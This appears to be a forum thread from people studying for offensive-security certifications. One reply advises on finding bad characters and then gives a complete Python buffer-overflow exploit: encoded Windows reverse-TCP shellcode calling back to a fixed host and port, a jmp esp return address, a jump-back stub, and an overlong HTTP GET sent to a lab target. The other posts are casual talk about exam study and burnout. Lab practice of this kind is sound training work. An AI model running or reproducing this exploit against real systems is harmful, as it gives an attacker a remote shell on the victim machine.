@DK: I assume you're not sending the shellcode because it doesn't make it there. Otherwise, that would be your first problem

You haven't got all the bad characters out, and even after that, you're not jumping back far enough. You'll currently land in the middle of the shellcode once you correct the characters.

x = ''
for i in range(0, 256):
    x += "\\x%02x" % i
print x

will give you a list of all 256 hex bytes. To start, use that as your shellcode and just keep sending longer and longer lines until it doesn't work, and then strip out a character. I put a break point at the beginning of your jump back and then compared the bytes that were present with what I sent. You could also automate that with pydbg if you're feeling ambitious. There's an example in the courseware.

#!/usr/bin/python

import socket

# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 R |msfencode -a x86 -b "\x00" -t c
#

• x86/shikata_ga_nai succeeded with size 341 (iteration=1)

shell_reverse_tcp = ("\xba\xe7\x88\x98\x9a\xd9\xc3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x4f\x31\x50\x14\x03\x50\x14\x83\xc0\x04\x05\x7d\x64\x72\x40"
"\x7e\x95\x83\x32\xf6\x70\xb2\x60\x6c\xf0\xe7\xb4\xe6\x54\x04"
"\x3f\xaa\x4c\x9f\x4d\x63\x62\x28\xfb\x55\x4d\xa9\xca\x59\x01"
"\x69\x4d\x26\x58\xbe\xad\x17\x93\xb3\xac\x50\xce\x3c\xfc\x09"
"\x84\xef\x10\x3d\xd8\x33\x11\x91\x56\x0b\x69\x94\xa9\xf8\xc3"
"\x97\xf9\x51\x58\xdf\xe1\xda\x06\xc0\x10\x0e\x55\x3c\x5a\x3b"
"\xad\xb6\x5d\xed\xfc\x37\x6c\xd1\x52\x06\x40\xdc\xab\x4e\x67"
"\x3f\xde\xa4\x9b\xc2\xd8\x7e\xe1\x18\x6d\x63\x41\xea\xd5\x47"
"\x73\x3f\x83\x0c\x7f\xf4\xc0\x4b\x9c\x0b\x05\xe0\x98\x80\xa8"
"\x27\x29\xd2\x8e\xe3\x71\x80\xaf\xb2\xdf\x67\xd0\xa5\xb8\xd8"
"\x74\xad\x2b\x0c\x0e\xec\x23\xe1\x3c\x0f\xb4\x6d\x37\x7c\x86"
"\x32\xe3\xea\xaa\xbb\x2d\xec\xcd\x91\x89\x62\x30\x1a\xe9\xab"
"\xf7\x4e\xb9\xc3\xde\xee\x52\x14\xde\x3a\xf4\x44\x70\x95\xb4"
"\x34\x30\x45\x5c\x5f\xbf\xba\x7c\x60\x15\xcd\xbb\xf7\x56\x66"
"\x42\x6c\x3f\x75\x44\x7d\xe3\xf0\xa2\x17\x0b\x55\x7d\x80\xb2"
"\xfc\xf5\x31\x3a\x2b\x9d\xd2\xa9\xb0\x5d\x9c\xd1\x6e\x0a\xc9"
"\x24\x67\xde\xe7\x1f\xd1\xfc\xf5\xc6\x1a\x44\x22\x3b\xa4\x45"
"\xa7\x07\x82\x55\x71\x87\x8e\x01\x2d\xde\x58\xff\x8b\x88\x2a"
"\xa9\x45\x66\xe5\x3d\x13\x44\x36\x3b\x1c\x81\xc0\xa3\xad\x7c"
"\x95\xdc\x02\xe9\x11\xa5\x7e\x89\xde\x7c\x3b\xb9\x94\xdc\x6a"
"\x52\x71\xb5\x2e\x3f\x82\x60\x6c\x46\x01\x80\x0d\xbd\x19\xe1"
"\x08\xf9\x9d\x1a\x61\x92\x4b\x1c\xd6\x93\x59")

# stack jmp  \xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1
jmp_back = "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"

# jmp esp \x7E\x42\x93\x53 USER32.dll
jmp_esp = "\x53\x93\x42\x7E"

expl = "\x41" * 1271 + "\x42" * 517 + jmp_esp + "\x90" * 50 + jmp_back + "\x90" * 361

buff = "GET" + expl + "HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = sock.connect(("192.168.1.124",80))
sock.send(buff)
sock.close()

Thanks everyone!!! 

Something that's funny: Since I knew exactly this time what I was getting myself into, I was so prepared mentally that I don't feel especially tired or exhausted (I mean, after two good nights of sleep).

I already started reading in "The Shellcoder's Handbook" yesterday. I am starting to study for OSCE tonight (first pass watching the videos).

BTW, I also stopped working on OSCE two years ago because after CISSP, I was totally brain dead. I --HATED-- studying for this exam!! I almost burn myself out. I ended up taking almost a full year off after CISSP...

But I am back now!

Anyone working on OSCE right now?